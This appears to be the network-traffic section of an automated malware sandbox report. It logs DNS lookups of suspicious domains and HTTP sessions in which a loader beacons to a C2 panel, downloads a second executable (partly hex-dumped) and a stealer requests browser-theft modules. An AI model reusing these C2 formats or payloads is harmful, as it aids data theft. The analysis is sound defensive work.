                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:25.560652018 CET192.168.2.41.1.1.10x3eb1Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:26.900499105 CET192.168.2.41.1.1.10x6290Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:26.900499105 CET192.168.2.41.1.1.10x1248Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:30.420717955 CET192.168.2.41.1.1.10x6036Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:31.827941895 CET192.168.2.41.1.1.10x26b1Standard query (0)fivetk5vt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:31.828285933 CET192.168.2.41.1.1.10x13a4Standard query (0)fivetk5vt.top28IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:34.817363024 CET192.168.2.41.1.1.10x6d8cStandard query (0)home.fivetk5vt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:34.817718983 CET192.168.2.41.1.1.10x7c2cStandard query (0)home.fivetk5vt.top28IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:46.769469023 CET192.168.2.41.1.1.10x93adStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:47.085719109 CET192.168.2.41.1.1.10xa8b1Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:01.550534010 CET192.168.2.41.1.1.10x2ffeStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.824595928 CET1.1.1.1192.168.2.40xb159Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.165894032 CET1.1.1.1192.168.2.40x6ac7No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.165894032 CET1.1.1.1192.168.2.40x6ac7No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354592085 CET1.1.1.1192.168.2.40x3693No error (0)cheapptaxysu.click104.21.67.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354592085 CET1.1.1.1192.168.2.40x3693No error (0)cheapptaxysu.click172.67.177.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.765125036 CET1.1.1.1192.168.2.40xa35aNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:34.765165091 CET1.1.1.1192.168.2.40x81c8No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.562997103 CET1.1.1.1192.168.2.40x4d7aNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.562997103 CET1.1.1.1192.168.2.40x4d7aNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.461781979 CET1.1.1.1192.168.2.40x17f4No error (0)home.fivetk5vt.top176.53.146.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.190004110 CET1.1.1.1192.168.2.40x26f7No error (0)home.fivetk5vt.top176.53.146.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:12.759462118 CET1.1.1.1192.168.2.40xc510Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:15.231345892 CET1.1.1.1192.168.2.40x5983No error (0)fivetk5vt.top176.53.146.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.013031960 CET1.1.1.1192.168.2.40xae0aNo error (0)fivetk5vt.top176.53.146.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:22.238502026 CET1.1.1.1192.168.2.40xb05eNo error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:25.697858095 CET1.1.1.1192.168.2.40x3eb1No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:25.697858095 CET1.1.1.1192.168.2.40x3eb1No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:25.697858095 CET1.1.1.1192.168.2.40x3eb1No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:25.697858095 CET1.1.1.1192.168.2.40x3eb1No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:27.037717104 CET1.1.1.1192.168.2.40x1248No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:27.040062904 CET1.1.1.1192.168.2.40x6290No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:30.741563082 CET1.1.1.1192.168.2.40x6036No error (0)aspecteirs.lat104.21.66.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:30.741563082 CET1.1.1.1192.168.2.40x6036No error (0)aspecteirs.lat172.67.157.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:31.965266943 CET1.1.1.1192.168.2.40x26b1No error (0)fivetk5vt.top176.53.146.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:34.955102921 CET1.1.1.1192.168.2.40x6d8cNo error (0)home.fivetk5vt.top176.53.146.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:47.079540014 CET1.1.1.1192.168.2.40x93adName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:47.312638998 CET1.1.1.1192.168.2.40xa8b1No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:47.312638998 CET1.1.1.1192.168.2.40xa8b1No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 19, 2024 14:27:01.690366030 CET1.1.1.1192.168.2.40x2ffeName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449730185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.856272936 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.554789066 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.449732185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.313106060 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:21.795205116 CET796INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:21 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 32 35 64 0d 0a 20 3c 63 3e 31 30 31 37 36 32 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 63 37 61 39 64 35 31 34 33 61 36 35 61 65 30 30 33 35 36 34 64 35 62 39 63 64 33 65 39 35 36 62 37 62 35 64 31 23 31 30 31 37 36 32 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 36 37 65 38 30 35 35 34 35 62 30 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 37 23 31 30 31 37 36 32 35 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 63 37 36 39 31 34 61 34 39 62 61 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 37 23 31 30 31 37 36 32 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: 25d <c>1017623001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcc7a9d5143a65ae003564d5b9cd3e956b7b5d1#1017624001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1017625001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbdc76914a49ba1cf64d4a485a9592e100b7#1017626001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#1017627001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc7709e5b03ac52ea484b411b9dc4e1#1017628001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70964e03ac52ea484b411b9dc4e1#<d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.44973531.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:22.001334906 CET63OUTGET /files/geopoxid/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364655972 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:23 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 1880576
                                                                                                                                                                                                                                                          Last-Modified: Wed, 18 Dec 2024 18:02:50 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "67630e4a-1cb200"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 69 eb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_g0J@`Ji@T0h 1 H@.rsrc X@.idata 0Z@ *@\@xnuzvlhe0/.^@tzuttanx J@.taggant00J"@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364669085 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364679098 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364690065 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364701986 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii: &Xt3sZD'cEQ%'z!qo
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364710093 CET1236INData Raw: 05 b6 d6 6e f3 0d 10 1a d8 27 dc 02 e1 66 87 55 f9 f4 9b 90 67 b3 2c f2 32 1d f6 e7 7d c3 fb 9d 31 e8 68 25 f1 4e 3c 54 63 e8 50 10 30 16 96 98 db 7f 52 11 75 d8 af a3 38 2b 2f 1b c9 70 18 0b b8 28 2e b9 02 2c 9b 3c 2d 54 16 4f b5 c2 95 50 38 5f
                                                                                                                                                                                                                                                          Data Ascii: n'fUg,2}1h%N<TcP0Ru8+/p(.,<-TOP8_)`i&d(Po893R}S*nss[wRv4s/7QrTj7$5UGRQ2S"O_s@rzGs.ZiMuq
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364720106 CET1236INData Raw: a0 7f 7f 2c d7 70 3d d0 3e 45 51 f0 e1 c9 76 bd c9 c9 c5 61 8c 39 d2 c9 7e 6e 01 8e 7c 37 29 ea 35 9a 74 4e ad a4 b8 c9 7c c9 07 85 62 77 d6 4d e9 f4 a1 a3 8b 74 6f 15 63 e4 24 54 63 05 0a db 7b 49 1e c3 00 c6 e6 48 23 34 0b e4 15 86 50 2b e7 eb
                                                                                                                                                                                                                                                          Data Ascii: ,p=>EQva9~n|7)5tN|bwMtoc$Tc{IH#4P+p=$ hVr2T&vXT9be`^e]sf!mU4]s7K#65G`0MH_[]st/`me+pL\z[|utW!
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364731073 CET1236INData Raw: 35 58 b4 b9 80 bd e0 e6 d4 0b 0d 33 1c 41 14 f8 db df 69 aa db b5 e9 27 61 90 25 ba 88 02 00 74 ba 40 a8 11 57 de 93 d0 36 aa 75 d2 3e 97 ad 4d 7a 06 97 0f 82 64 49 ce 32 50 ca bb a0 6b c6 6f 87 bc 09 de df 74 44 0a 5a 5d 17 0e eb 70 ec 9c b5 90
                                                                                                                                                                                                                                                          Data Ascii: 5X3Ai'a%t@W6u>MzdI2PkotDZ]p?l',V/bYTkzX])QS7mXj|qhuu}fC^ROD5JWP6_.P@R+ :>"LfHSw7:t{
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364743948 CET1236INData Raw: 20 db 58 86 d4 cc a7 a1 c8 89 50 3b f0 09 24 bc 73 75 46 b8 f8 54 ab 09 8f 15 35 e8 fa 53 34 08 0c 6d 02 f9 52 9e 74 1d 9d 93 a4 76 0e 6e 61 e1 29 ce 5e e2 ed 94 2f b0 98 8f 03 f0 db 68 b1 4b 58 50 58 c8 62 99 25 c9 af d1 3a ce 59 3d 52 70 78 01
                                                                                                                                                                                                                                                          Data Ascii: XP;$suFT5S4mRtvna)^/hKXPXb%:Y=Rpx-|u{>DRKe!:WFFG|Qtk[~c"UQtm3 YFPw?Uh!%6ldR{~SXwtZRuTZ !>1k7Vr!t"7/=
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364754915 CET1236INData Raw: d0 49 2f 4f c5 02 28 58 f1 37 57 73 85 60 09 41 34 07 1e ec fe 74 dc 85 ea bb 5e ea 09 09 b4 75 03 97 e1 be c8 10 6a 9c 57 ed 26 cb 3f 48 c9 c9 78 d2 bc 93 6f d5 1d f8 84 bc 31 9c 49 23 31 cf 37 08 ed fc 2d cf 9e 11 29 e8 85 00 35 a0 4e cd 3f 04
                                                                                                                                                                                                                                                          Data Ascii: I/O(X7Ws`A4t^ujW&?Hxo1I#17-)5N?d'Zp@cU7t?V,Nb!|%i|(|K-Ois1q.s9\"=pJ`vaXnQX}T}.$?42)G18,=:i];5[G
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.486767054 CET1236INData Raw: ed da a6 7c c5 5d 07 dc 71 b8 a9 17 79 d2 94 c5 73 34 5d 50 f4 dd 47 58 3a 03 2b a0 b7 ee cd 35 57 1e 9c d0 d9 ee 5c 3e 31 ae fd 0b b0 60 88 01 8d 71 66 32 f1 d1 20 e4 ec 05 d5 39 d8 a0 09 f6 0f 50 27 3d e1 37 9a ff d5 e4 3f de f4 67 cb 48 8b f5
                                                                                                                                                                                                                                                          Data Ascii: |]qys4]PGX:+5W\>1`qf2 9P'=7?gH:F7T $:+%qpJ]^:|T-,Uy~P5#v462RI5HlJ ld4A#e*]CMhSIuCK7?


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.449737185.215.113.206805932C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.045900106 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.379280090 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:25 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.389425039 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDA
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 211
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 46 30 33 43 33 42 42 32 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="hwid"C1F03C3BB2381806970752------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="build"stok------KKFHJDAEHIEHJJKFBGDA--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.929354906 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:25 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Content-Length: 180
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Data Raw: 4e 57 4d 33 59 54 51 30 59 7a 68 6d 4e 54 41 79 4d 44 46 6a 59 7a 42 69 4f 54 4e 6d 4f 47 45 33 4d 32 59 78 4e 6a 5a 6c 59 6a 46 6a 4e 54 6b 79 5a 6a 68 6d 4d 44 59 34 59 7a 59 32 5a 47 49 35 4e 6a 59 7a 5a 44 41 34 5a 6d 52 6c 4e 32 59 34 59 57 52 6a 5a 57 56 6d 5a 6a 45 31 5a 44 42 6d 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                          Data Ascii: NWM3YTQ0YzhmNTAyMDFjYzBiOTNmOGE3M2YxNjZlYjFjNTkyZjhmMDY4YzY2ZGI5NjYzZDA4ZmRlN2Y4YWRjZWVmZjE1ZDBmfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:25.932810068 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHID
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 268
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="message"browsers------AKFCBFHJDHJKECAKEHID--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.410038948 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:26 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Content-Length: 2028
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
